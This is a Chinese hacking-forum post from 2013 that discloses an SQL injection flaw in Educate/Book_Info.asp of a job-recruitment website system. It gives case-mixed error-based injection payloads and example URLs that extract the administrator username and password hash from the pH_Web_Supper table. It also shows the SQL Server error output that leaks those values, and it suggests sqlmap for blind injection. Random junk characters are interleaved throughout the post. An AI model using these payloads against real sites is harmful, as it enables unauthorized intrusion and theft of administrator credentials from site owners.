中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]
作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
- ~3 X8 b8 N) ]1 `5 F + x) s& e" I) }4 ~
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
) f! O( {$ j  R, A& l1 o6 R
9 ?8 ~. o2 |6 J5 l, l* c1 Gexp:如下
, O/ ?" A" l1 |8 U1 \6 x3 _查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ j2 N1 j0 b+ u. e查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ u7 Z0 a6 V! ~/ o+ }; O2 O! h6 E
  n, a2 q( U& S9 f- fhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)0 M. s* q0 s% b' U- ]% N' G

8 N. [" ~, n, P* T9 n1 hMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'0 R2 J) n; B2 @% @% L. C
' W! k. a2 m( y
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
8 W+ v/ f2 m5 \ " ^5 ]# d! _% _- O
/Educate/Book_Info.asp,行 8
. x/ T/ r! m9 y: d/ @ % B/ ~% }) C( Z5 |
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 j0 }  S, H  N/ ~& [# |4 a
. K; \8 S! s' s! w! q0 \Microsoft OLE DB Provider for SQL Server 错误 '80040e07'8 K" {4 |2 k7 f/ Y$ G( O
9 z$ _9 d7 d# x5 E8 \' M2 @$ Y
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。  R4 A1 g9 d8 \) C7 C3 L0 w3 z4 J

# x0 R& a- }5 z% H/Educate/Book_Info.asp,行 8
& N+ s) B% Y& f: m3 c- S



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2